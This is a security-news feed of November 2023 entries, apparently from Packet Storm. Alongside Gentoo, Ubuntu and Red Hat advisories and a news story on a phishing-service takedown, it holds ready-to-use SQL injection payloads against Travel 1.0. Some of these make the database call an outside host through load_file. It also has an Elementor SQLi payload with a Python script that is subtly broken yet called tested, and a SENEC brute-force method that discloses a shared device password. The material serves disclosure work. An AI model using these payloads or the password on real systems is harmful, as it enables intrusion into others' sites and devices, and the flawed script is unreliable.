Travel version 1.0 suffers from a remote SQL injection vulnerability.

    ## Title: travel-1.0-by-oretnom23 Multiple-SQLi## Author: nu11secur1ty## Date: 11/12/2023## Vendor: https://github.com/oretnom23## Software: https://github.com/oretnom23/php-travel-agency-system## Reference: https://portswigger.net/web-security/sql-injection## Description:The search parameter appears to be vulnerable to SQL injectionattacks. The payload '+(selectload_file('\\\\fn6kppbx0o26diasg3tbss1980et2k68xbl38twi.github.com/oretnom23/php-travel-agency-system\\yhj'))+'was submitted in the search parameter. This payload injects a SQLsub-query that calls MySQL's load_file function with a UNC file paththat references a URL on an external domain. The applicationinteracted with that domain, indicating that the injected SQL querywas executed.STATUS: HIGH-CRITICAL Vulnerability[+]Payload:```MySQL---Parameter: search (POST)    Type: boolean-based blind    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BYor GROUP BY clause    Payload: search=951531'+(selectload_file('\\\\fn6kppbx0o26diasg3tbss1980et2k68xbl38twi.github.com/oretnom23/php-travel-agency-system\\yhj'))+''RLIKE (SELECT (CASE WHEN (2997=2997) THEN 0x393531353331+(selectload_file(0x5c5c5c5c666e366b70706278306f323664696173673374627373313938306574326b363878626c33387477692e6f6173746966792e636f6d5c5c79686a))+''ELSE 0x28 END)) AND 'RIBa'='RIBa&searc=&sumbit=Submit    Type: time-based blind    Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP)    Payload: search=951531'+(selectload_file('\\\\fn6kppbx0o26diasg3tbss1980et2k68xbl38twi.github.com/oretnom23/php-travel-agency-system\\yhj'))+''OR (SELECT 5424 FROM (SELECT(SLEEP(15)))vzOn) AND'fGlq'='fGlq&searc=&sumbit=Submit    Type: UNION query    Title: MySQL UNION query (NULL) - 28 columns    Payload: search=951531'+(selectload_file('\\\\fn6kppbx0o26diasg3tbss1980et2k68xbl38twi.github.com/oretnom23/php-travel-agency-system\\yhj'))+''UNION ALL SELECTNULL,NULL,NULL,NULL,CONCAT(0x716a767071,0x6c425375664275724e58584e686366544b776557504941584e71765144757876744972504e4f554d,0x7162767071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&searc=&sumbit=Submit---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2021/travel-1.0-by-oretnom23)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/11/travel-10-by-oretnom23-multiple-sqli.html)## Time spent:00:17:00

Travel 1.0 SQL Injection

Elementor Website Builder versions prior to 3.12.2 suffer from a remote SQL injection vulnerability.

    #EXPLOIT Elementor Website Builder < 3.12.2 - Admin+ SQLi#References#CVE : CVE-2023-0329#E1.Coders Open Burp Suite.In Burp Suite, go to the "Proxy" tab and set it to listen on a specific port, such as 8080.Open a new browser window or tab, and set your proxy settings to use Burp Suite on port 8080.Visit the vulnerable Elementor Website Builder site and navigate to the Tools > Replace URL page.On the Replace URL page, enter any random string as the "New URL" and the following malicious payload as the "Old URL": code : http://localhost:8080/?test'),meta_key='key4'where+meta_id=SLEEP(2);#Press "Replace URL" on the Replace URL page. Burp Suite should intercept the request.Forward the intercepted request to the server by right-clicking the request in Burp Suite and selecting "Forward".The server will execute the SQL command, which will cause it to hang for 2 seconds before responding. This is a clear indication of successful SQL injection.Note: Make sure you have permission to perform these tests and have set up Burp Suite correctly. This command may vary depending on the specific setup of your server and the website builder plugin.</s References :  https://wpscan.com/vulnerability/a875836d-77f4-4306-b275-2b60efff1493/    Exploit Python  :The provided SQLi attack vector can be achieved using the following Python code with the "requests" library: This script sends a POST request to the target URL with the SQLi payload as the "data" parameter. It then checks if the response contains the SQLi payload, indicating a successful SQL injection.Please make sure you have set up your Burp Suite environment correctly. Additionally, it is important to note that this script and attack have been TESTED and are correct import requests # Set the target URL and SQLi payloadurl = "http://localhost:8080/wp-admin/admin-ajax.php"data = {    "action": "elementor_ajax_save_builder",    "editor_post_id": "1",    "post_id": "1",    "data": "test'),meta_key='key4'where+meta_id=SLEEP(2);#"} # Send the request to the target URLresponse = requests.post(url, data=data) # Check if the response indicates a successful SQL injectionif "meta_key='key4'where+meta_id=SLEEP(2);#" in response.text:    print("SQL Injection successful!")else:    print("SQL Injection failed.")

Elementor Website Builder SQL Injection

Gentoo Linux Security Advisory 202311-2 - Multiple vulnerabilities have been discovered in Netatalk, which could lead to remote code execution Versions greater than or equal to 3.1.18 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202311-02  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Netatalk: Multiple Vulnerabilities including root remote code execution  
     Date: November 01, 2023  
     Bugs: #837623, #881259, #915354  
       ID: 202311-02

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in Netatalk, which could  
lead to remote code execution

Background  
==========

Netatalk is a kernel level implementation of the AppleTalk Protocol  
Suite, which allows Unix hosts to act as file, print, and time servers  
for Apple computers. It includes several script utilities, including  
etc2ps.sh.

Affected packages  
=================

Package          Vulnerable    Unaffected  
---------------  ------------  ------------  
net-fs/netatalk  < 3.1.18      >= 3.1.18

Description  
===========

Multiple vulnerabilities have been discovered in Netatalk. Please review  
the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Netatalk users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=net-fs/netatalk-3.1.18"

References  
==========

[ 1 ] CVE-2021-31439  
      https://nvd.nist.gov/vuln/detail/CVE-2021-31439  
[ 2 ] CVE-2022-0194  
      https://nvd.nist.gov/vuln/detail/CVE-2022-0194  
[ 3 ] CVE-2022-22995  
      https://nvd.nist.gov/vuln/detail/CVE-2022-22995  
[ 4 ] CVE-2022-23121  
      https://nvd.nist.gov/vuln/detail/CVE-2022-23121  
[ 5 ] CVE-2022-23122  
      https://nvd.nist.gov/vuln/detail/CVE-2022-23122  
[ 6 ] CVE-2022-23123  
      https://nvd.nist.gov/vuln/detail/CVE-2022-23123  
[ 7 ] CVE-2022-23124  
      https://nvd.nist.gov/vuln/detail/CVE-2022-23124  
[ 8 ] CVE-2022-23125  
      https://nvd.nist.gov/vuln/detail/CVE-2022-23125  
[ 9 ] CVE-2022-45188  
      https://nvd.nist.gov/vuln/detail/CVE-2022-45188

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202311-02

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202311-02

Ubuntu Security Notice 6468-1 - Multiple security issues were discovered in Thunderbird. If a user were tricked into opening a specially crafted website in a browsing context, an attacker could potentially exploit these to cause a denial of service, obtain sensitive information, bypass security restrictions, cross-site tracing, or execute arbitrary code. Kelsey Gilbert discovered that Thunderbird did not properly manage certain browser prompts and dialogs due to an insufficient activation-delay. An attacker could potentially exploit this issue to perform clickjacking.

    ==========================================================================Ubuntu Security Notice USN-6468-1November 02, 2023thunderbird vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 23.10- Ubuntu 23.04- Ubuntu 22.04 LTS- Ubuntu 20.04 LTSSummary:Several security issues were fixed in Thunderbird.Software Description:- thunderbird: Mozilla Open Source mail and newsgroup clientDetails:Multiple security issues were discovered in Thunderbird. If a user weretricked into opening a specially crafted website in a browsing context, anattacker could potentially exploit these to cause a denial of service,obtain sensitive information, bypass security restrictions, cross-sitetracing, or execute arbitrary code. (CVE-2023-5724, CVE-2023-5728,CVE-2023-5730, CVE-2023-5732)Kelsey Gilbert discovered that Thunderbird did not properly manage certainbrowser prompts and dialogs due to an insufficient activation-delay. Anattacker could potentially exploit this issue to perform clickjacking.(CVE-2023-5721)Shaheen Fazim discovered that Thunderbird did not properly validate the URLsopen by installed WebExtension. An attacker could potentially exploit thisissue to obtain sensitive information. (CVE-2023-5725)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 23.10:  thunderbird                     1:115.4.1+build1-0ubuntu0.23.10.1Ubuntu 23.04:  thunderbird                     1:115.4.1+build1-0ubuntu0.23.04.1Ubuntu 22.04 LTS:  thunderbird                     1:115.4.1+build1-0ubuntu0.22.04.1Ubuntu 20.04 LTS:  thunderbird                     1:115.4.1+build1-0ubuntu0.20.04.1In general, a standard system update will make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-6468-1  CVE-2023-5721, CVE-2023-5724, CVE-2023-5725, CVE-2023-5728,  CVE-2023-5730, CVE-2023-5732Package Information:  https://launchpad.net/ubuntu/+source/thunderbird/1:115.4.1+build1-0ubuntu0.23.10.1  https://launchpad.net/ubuntu/+source/thunderbird/1:115.4.1+build1-0ubuntu0.23.04.1  https://launchpad.net/ubuntu/+source/thunderbird/1:115.4.1+build1-0ubuntu0.22.04.1  https://launchpad.net/ubuntu/+source/thunderbird/1:115.4.1+build1-0ubuntu0.20.04.1

Ubuntu Security Notice USN-6468-1

Gentoo Linux Security Advisory 202311-1 - A vulnerability has been discovered in GitPython where crafted input to Repo.clone_from can lead to code execution. Versions greater than or equal to 3.1.30 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202311-01  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: GitPython: Code Execution via Crafted Input  
     Date: November 01, 2023  
     Bugs: #884623  
       ID: 202311-01

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been discovered in GitPython where crafted input to  
Repo.clone_from can lead to code execution

Background  
==========

GitPython is a Python library used to interact with Git repositories.

Affected packages  
=================

Package               Vulnerable    Unaffected  
--------------------  ------------  ------------  
dev-python/GitPython  < 3.1.30      >= 3.1.30

Description  
===========

Please review the CVE identifier referenced below for details.

Impact  
======

An attacker may be able to trigger Remote Code Execution (RCE) due to  
improper user input validation, which makes it possible to inject a  
maliciously crafted remote URL into the clone command. Exploiting this  
vulnerability is possible because the library makes external calls to  
git without sufficient sanitization of input arguments.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All GitPython users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=dev-python/GitPython-3.1.30"

References  
==========

[ 1 ] CVE-2022-24439  
      https://nvd.nist.gov/vuln/detail/CVE-2022-24439

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202311-01

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202311-01

EnBw SENEC Legacy Storage Box versions 1 through 3 appear to suffer from a hardcoded credential vulnerability.

Advisory ID:               Ph0s-2023-003  
Product:                   EnBw - SENEC legacy storage box: V1-V3  
Manufacturer:              SENEC - a part of EnBw  
Affected Version(s):       Firmware: all (as of 2023-06-19)  
Tested Version(s):         current  
Vulnerability Type:        CWE-307: Improper Restriction of Excessive 

                           Authentication Attempts  
                           CWE-798: Use of Hard-coded Credentials

Risk Level: 

CVSS v3.1 Vector:  
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H (9.8 Critical)

Manufacturer Risk Level Rating:  
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L/E:H/RL:U/RC:C  
Overall CVSS Score: 8.6

Solution Status:           Fixed  
Manufacturer Notification: 2023-06-05  
Public Disclosure:         2023-11-01  
CVE Reference:             CVE-2023-39168  
Author of Advisory:        Ph0s[4], R0ckE7

********************************************************************************

Overview:  
Foreword: 

This vulnerability was reported to the enbw-cert. we would like to  
thank enbw-cert for taking care of the vulns and patch the systems.  
we decided to publish when most of the reported vulns are patched  
to make sure nobody is harmed when 3rdparys exploit the mentioned vulns. 

About Senec:  
We are SENEC

We have been the EnBW energy independence experts since 2018 – but we have  
put our heart and soul into guiding customers on the route to independence  
since SENEC was founded in 2009. Our passion lies in actively promoting the  
energy transition with innovative ideas and pioneering products. And, 

because we don’t do things by halves, our unwavering ambition is to create  
integrated solutions that enable you to enjoy the highest possible degree  
of independence and sustainability through self-generation of solar 

electricity.

About SENEC Home:

SENEC.Home: The smart electricity storage device for your home

SENEC.Home is the heart of the your sustainable, affordable supply of solar  
electricity. The smart battery storage device stores excess electricity 

generated by your PV system so that you can use it when you need it – such as  
when your household’s energy consumption rises in the evening, or on rainy days  
when your PV system generates less power.

********************************************************************************

Vulnerability Details:

Based on the previously identified hard-coded username in CVE-2023-39167 and  
CVE-2023-39168 all technical requirements were met to target the password. 

Since the username installateur is quite straightforward in the sense of 

guessable, it was decided to perform a dictonary-type brute force attack. 

For this purpose, all related PDF documents were downloaded to create a password  
list specifically tailored to SENEC.Inverter. 

Source of the Documents: https://senec.com/au/company/downloads

********************************************************************************

Proof of Concept (PoC):

The attack consists of the following steps:

1. parse the documents :  
import argparse  
import glob  
import string  
import fitz

def get_senec_password(pdf_directory, pwd_prefix, pwd_suffix):  
    pdf_text = ""  
    for file in glob.glob(f"{pdf_directory}/*.pdf"):  
        pdf = fitz.open(file)  
        for page in pdf:  
            pdf_text += page.get_text()

    pdf_words = set(  
        [word.strip(string.punctuation) for word in pdf_text.split() if word.strip(string.punctuation).isalnum()]  
    )  
    senec_password = set(  
        [f"{pwd_prefix}{word}{pwd_suffix}" for word in pdf_words if not word.isnumeric()]  
    )

    with open("senec-password.txt", mode="w", encoding="utf-8") as fd:  
        fd.write('\n'.join(senec_password))

if __name__ == '__main__':  
    parser = argparse.ArgumentParser(description="Generate SENEC.Inverter password dictionary")  
    parser.add_argument("-d", "--pdf-directory", type=str, action="store", default="pdf", required=False,  
                        help="pdf storage location")  
    parser.add_argument("-p", "--pwd-prefix", type=str, action="store", default="Senec", required=False,  
                        help="password prefix")  
    parser.add_argument("-s", "--pwd-suffix", type=str, action="store", default="", required=False,  
                        help="password suffix")  
    args = parser.parse_args()  
    get_senec_password(args.pdf_directory, args.pwd_prefix, args.pwd_suffix)

2. work with the output:  
The Python script extracts all words from all PDF documents and allows to add a prefix  
and/or suffix to generate passwords according to the pattern {prefix}{word}{suffix} ,  
such as the following:  
***** cut *******  
Senecmoribundity  
SenecCleaning  
Senecdusts  
Senecclinical  
Senecaggregation  
Senecstubborn  
Senecstorages  
SenecDecommissioning  
SenecInstall  
Senecmany  
***** cut ********

3) use the list within burpsuite  
The password lists were then used in Burp Suite Professional, a tool 

specifically designed for web application security testing, to perform an 

automated brute force attack.  
The list shown above as an excerpt with the prefix Senec and no suffix was 

finally successful in executing the attack.  
It could be determined that the password "SenecInstall" is valid for all  
SENEC.Inverter devices.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:  
Patched by Manufacturer  
(Rolled out until September 11, 2023)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2022-06-01: Vulnerability discovered  
2023-06-05: Vulnerability reported to manufacturer  
2023-09-11: Patch rollout by manufacturer to affected devices  
2023-11-01: Public disclosure of vulnerability

************************************************************************

Researcher:  
Ph0s[4], R0ckE7

************************************************************************

Disclaimer:

The information provided in this security advisory is provided "as is"  
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible. 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 4.0  
URL: https://creativecommons.org/licenses/by/4.0/deed.en

EnBw SENEC Legacy Storage Box Hardcoded Credentials

Ubuntu Security Notice 6465-1 - Yu Hao and Weiteng Chen discovered that the Bluetooth HCI UART driver in the Linux kernel contained a race condition, leading to a null pointer dereference vulnerability. A local attacker could use this to cause a denial of service. Lin Ma discovered that the Netlink Transformation subsystem in the Linux kernel contained a null pointer dereference vulnerability in some situations. A local privileged attacker could use this to cause a denial of service.

    ==========================================================================Ubuntu Security Notice USN-6465-1October 31, 2023linux, linux-aws, linux-aws-5.15, linux-azure, linux-azure-5.15,linux-azure-fde, linux-azure-fde-5.15, linux-gcp, linux-gcp-5.15,linux-gkeop, linux-gkeop-5.15, linux-hwe-5.15, linux-ibm, linux-ibm-5.15,linux-kvm, linux-lowlatency, linux-lowlatency-hwe-5.15, linux-nvidia,linux-oracle, linux-oracle-5.15 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTS- Ubuntu 20.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux: Linux kernel- linux-aws: Linux kernel for Amazon Web Services (AWS) systems- linux-azure: Linux kernel for Microsoft Azure Cloud systems- linux-azure-fde: Linux kernel for Microsoft Azure CVM cloud systems- linux-gcp: Linux kernel for Google Cloud Platform (GCP) systems- linux-gkeop: Linux kernel for Google Container Engine (GKE) systems- linux-ibm: Linux kernel for IBM cloud systems- linux-kvm: Linux kernel for cloud environments- linux-lowlatency: Linux low latency kernel- linux-nvidia: Linux kernel for NVIDIA systems- linux-oracle: Linux kernel for Oracle Cloud systems- linux-aws-5.15: Linux kernel for Amazon Web Services (AWS) systems- linux-azure-5.15: Linux kernel for Microsoft Azure cloud systems- linux-azure-fde-5.15: Linux kernel for Microsoft Azure CVM cloud systems- linux-gcp-5.15: Linux kernel for Google Cloud Platform (GCP) systems- linux-gkeop-5.15: Linux kernel for Google Container Engine (GKE) systems- linux-hwe-5.15: Linux hardware enablement (HWE) kernel- linux-ibm-5.15: Linux kernel for IBM cloud systems- linux-lowlatency-hwe-5.15: Linux low latency kernel- linux-oracle-5.15: Linux kernel for Oracle Cloud systemsDetails:Yu Hao and Weiteng Chen discovered that the Bluetooth HCI UART driver inthe Linux kernel contained a race condition, leading to a null pointerdereference vulnerability. A local attacker could use this to cause adenial of service (system crash). (CVE-2023-31083)Lin Ma discovered that the Netlink Transformation (XFRM) subsystem in theLinux kernel contained a null pointer dereference vulnerability in somesituations. A local privileged attacker could use this to cause a denial ofservice (system crash). (CVE-2023-3772)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS:   linux-image-5.15.0-1032-gkeop   5.15.0-1032.38   linux-image-5.15.0-1040-nvidia  5.15.0-1040.40   linux-image-5.15.0-1040-nvidia-lowlatency  5.15.0-1040.40   linux-image-5.15.0-1042-ibm     5.15.0-1042.45   linux-image-5.15.0-1046-gcp     5.15.0-1046.54   linux-image-5.15.0-1046-kvm     5.15.0-1046.51   linux-image-5.15.0-1047-oracle  5.15.0-1047.53   linux-image-5.15.0-1049-aws     5.15.0-1049.54   linux-image-5.15.0-1051-azure   5.15.0-1051.59   linux-image-5.15.0-1051-azure-fde  5.15.0-1051.59.1   linux-image-5.15.0-88-generic   5.15.0-88.98   linux-image-5.15.0-88-generic-64k  5.15.0-88.98   linux-image-5.15.0-88-generic-lpae  5.15.0-88.98   linux-image-5.15.0-88-lowlatency  5.15.0-88.98   linux-image-5.15.0-88-lowlatency-64k  5.15.0-88.98   linux-image-aws-lts-22.04       5.15.0.1049.48   linux-image-azure-fde-lts-22.04  5.15.0.1051.59.29   linux-image-azure-lts-22.04     5.15.0.1051.47   linux-image-gcp-lts-22.04       5.15.0.1046.42   linux-image-generic             5.15.0.88.85   linux-image-generic-64k         5.15.0.88.85   linux-image-generic-lpae        5.15.0.88.85   linux-image-gkeop               5.15.0.1032.31   linux-image-gkeop-5.15          5.15.0.1032.31   linux-image-ibm                 5.15.0.1042.38   linux-image-kvm                 5.15.0.1046.42   linux-image-lowlatency          5.15.0.88.90   linux-image-lowlatency-64k      5.15.0.88.90   linux-image-nvidia              5.15.0.1040.40   linux-image-nvidia-lowlatency   5.15.0.1040.40   linux-image-oracle              5.15.0.1047.42   linux-image-oracle-lts-22.04    5.15.0.1047.42   linux-image-virtual             5.15.0.88.85Ubuntu 20.04 LTS:   linux-image-5.15.0-1032-gkeop   5.15.0-1032.38~20.04.1   linux-image-5.15.0-1042-ibm     5.15.0-1042.45~20.04.1   linux-image-5.15.0-1046-gcp     5.15.0-1046.54~20.04.1   linux-image-5.15.0-1047-oracle  5.15.0-1047.53~20.04.1   linux-image-5.15.0-1049-aws     5.15.0-1049.54~20.04.1   linux-image-5.15.0-1051-azure   5.15.0-1051.59~20.04.1   linux-image-5.15.0-1051-azure-fde  5.15.0-1051.59~20.04.1.1   linux-image-5.15.0-88-generic   5.15.0-88.98~20.04.1   linux-image-5.15.0-88-generic-64k  5.15.0-88.98~20.04.1   linux-image-5.15.0-88-generic-lpae  5.15.0-88.98~20.04.1   linux-image-5.15.0-88-lowlatency  5.15.0-88.98~20.04.1   linux-image-5.15.0-88-lowlatency-64k  5.15.0-88.98~20.04.1   linux-image-aws                 5.15.0.1049.54~20.04.37   linux-image-azure               5.15.0.1051.59~20.04.40   linux-image-azure-cvm           5.15.0.1051.59~20.04.40   linux-image-azure-fde           5.15.0.1051.59~20.04.1.29   linux-image-gcp                 5.15.0.1046.54~20.04.1   linux-image-generic-64k-hwe-20.04  5.15.0.88.98~20.04.46   linux-image-generic-hwe-20.04   5.15.0.88.98~20.04.46   linux-image-generic-lpae-hwe-20.04  5.15.0.88.98~20.04.46   linux-image-gkeop-5.15          5.15.0.1032.38~20.04.28   linux-image-ibm                 5.15.0.1042.45~20.04.14   linux-image-lowlatency-64k-hwe-20.04  5.15.0.88.98~20.04.43   linux-image-lowlatency-hwe-20.04  5.15.0.88.98~20.04.43   linux-image-oem-20.04           5.15.0.88.98~20.04.46   linux-image-oem-20.04b          5.15.0.88.98~20.04.46   linux-image-oem-20.04c          5.15.0.88.98~20.04.46   linux-image-oem-20.04d          5.15.0.88.98~20.04.46   linux-image-oracle              5.15.0.1047.53~20.04.1   linux-image-virtual-hwe-20.04   5.15.0.88.98~20.04.46After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6465-1   CVE-2023-31083, CVE-2023-3772Package Information:   https://launchpad.net/ubuntu/+source/linux/5.15.0-88.98   https://launchpad.net/ubuntu/+source/linux-aws/5.15.0-1049.54   https://launchpad.net/ubuntu/+source/linux-azure/5.15.0-1051.59   https://launchpad.net/ubuntu/+source/linux-azure-fde/5.15.0-1051.59.1   https://launchpad.net/ubuntu/+source/linux-gcp/5.15.0-1046.54   https://launchpad.net/ubuntu/+source/linux-gkeop/5.15.0-1032.38   https://launchpad.net/ubuntu/+source/linux-ibm/5.15.0-1042.45   https://launchpad.net/ubuntu/+source/linux-kvm/5.15.0-1046.51   https://launchpad.net/ubuntu/+source/linux-lowlatency/5.15.0-88.98   https://launchpad.net/ubuntu/+source/linux-nvidia/5.15.0-1040.40   https://launchpad.net/ubuntu/+source/linux-oracle/5.15.0-1047.53   https://launchpad.net/ubuntu/+source/linux-aws-5.15/5.15.0-1049.54~20.04.1   https://launchpad.net/ubuntu/+source/linux-azure-5.15/5.15.0-1051.59~20.04.1 https://launchpad.net/ubuntu/+source/linux-azure-fde-5.15/5.15.0-1051.59~20.04.1.1   https://launchpad.net/ubuntu/+source/linux-gcp-5.15/5.15.0-1046.54~20.04.1   https://launchpad.net/ubuntu/+source/linux-gkeop-5.15/5.15.0-1032.38~20.04.1   https://launchpad.net/ubuntu/+source/linux-hwe-5.15/5.15.0-88.98~20.04.1   https://launchpad.net/ubuntu/+source/linux-ibm-5.15/5.15.0-1042.45~20.04.1 https://launchpad.net/ubuntu/+source/linux-lowlatency-hwe-5.15/5.15.0-88.98~20.04.1 https://launchpad.net/ubuntu/+source/linux-oracle-5.15/5.15.0-1047.53~20.04.1

Ubuntu Security Notice USN-6465-1

By Deeba Ahmed
The global operation also led to the arrest of eight individuals, including the alleged mastermind.
This is a post from HackRead.com Read the original post: Police Dismantle Phishing-as-a-Service Platform BulletProftLink

BulletProftLink, a prolific phishing-as-a-service (PhaaS) and initial access broker (IAB) operation was operating since 2015.

In a significant blow to the cybercrime community, Malaysian police have dismantled BulletProftLink, a prolific phishing-as-a-service (PhaaS) and initial access broker (IAB) operation.

The seizure was a result of a collaborative effort between the Royal Malaysian Police, the Australian Federal Police, and the FBI. The authorities arrested eight individuals on 6 November, 2023 including the platform’s alleged mastermind and a software engineer.

Additionally, security agencies also seized cryptocurrency wallets containing approx. $213,000, apart from jewellery, servers, payment cards, and computers.

BulletProftLink, a prolific **phishing-as-a-service** (PhaaS) and initial access broker (IAB) operation was operating since 2015. It served thousands of threat actors with tools and resources to conduct phishing attacks through its extensive collection of phishing templates (over 300), including login pages for prominent services like DHL, Microsoft Office, Naver, and financial institutions.

Some of these pages were hosted on legit cloud services such as Google Cloud and Microsoft Azure. It also aided attackers in **bypassing MFA** (multi-factor authentication) protections by offering the **Evilginx2** reverse-proxying tool that could lead to Adversary-in-the-Middle phishing attacks.

**According to** Malaysian police, the platform had become intensely active since 2018, and that’s when it came to their radar. Since its inception, BulletProftLink has attracted over 8000 clients, many of whom paid up to $2,000/month for accessing credential logs regularly. Malicious actors preferred it for buying stolen accounts to conduct frauds and cyberattacks.

“From our investigations, not only the syndicate has compromised websites those of financial and education institutions, and official government sites in Australia, but they are also involved with the selling of stolen credentials,” stated Royal Malaysian Police’s inspector general, Sri Razarudin Husain.

This platform remained a key source for cybercriminals to infiltrate corporate networks, conduct reconnaissance, and laterally move towards valuable targets. Intel471, a threat intelligence platform, was monitoring the platform’s activities, and the following screenshot has been captured from their **coverage** of the event.

The screenshot reveals phishing templates for various platforms that were previously accessible on the BulletProofLink website.

The authorities haven’t yet disclosed the identities of the **arrested individuals**. As per cyber threat intelligence professionals, a threat actor, AnthraxBP, could be linked to the platform, and certain operational mistakes from BulletProftLink could have led to its dismantling.

The authorities have taken down multiple domains of the platform. Its closure is certainly a huge victory against cybercriminals because BulletProftink had remained a crucial source of stolen credentials for threat actors. Now that it is out of the picture, cybercriminals will need to look for alternative sources to gain initial access to corporate networks.

1.  **NetWire Malware Site and Server Seized, Admin Arrested**
2.  **Ragnar Locker Ransomware Gang Dismantled, Key Suspect Arrested**
3.  **SSNDOB Cybercrime Marketplace Seized in Intl. Coordinated Operation**
4.  **INTERPOL Dismantles Infamous ’16shop’ Phishing-as-a-Service Platform**
5.  **EvilProxy Phishing Kit Targets Microsoft Users via Indeed.com Vulnerability**

Police Dismantle Phishing-as-a-Service Platform BulletProftLink

Red Hat Security Advisory 2023-6256-01 - Red Hat OpenShift Container Platform release 4.13.21 is now available with updates to packages and images that fix several bugs.

The following data is constructed from data provided by Red Hat's json file at:

https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_6256.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: OpenShift Container Platform 4.13.21 security and extras update  
Advisory ID:        RHSA-2023:6256-01  
Product:            Red Hat OpenShift Enterprise  
Advisory URL:       https://access.redhat.com/errata/RHSA-2023:6256  
Issue date:         2023-11-08  
Revision:           01  
CVE Names:          CVE-2023-39325  
====================================================================

Summary: 

Red Hat OpenShift Container Platform release 4.13.21 is now available with updates to packages and images that fix several bugs.

This release includes a security update for Red Hat OpenShift Container Platform 4.13.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.

There are no RPM packages for this update.

Security Fix(es):

* golang: net/http, x/net/http2: rapid stream resets can cause excessive work (Rapid Reset Attack) (CVE-2023-39325)

A Red Hat Security Bulletin which addresses further details about the Rapid Reset flaw is available in the References section.

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

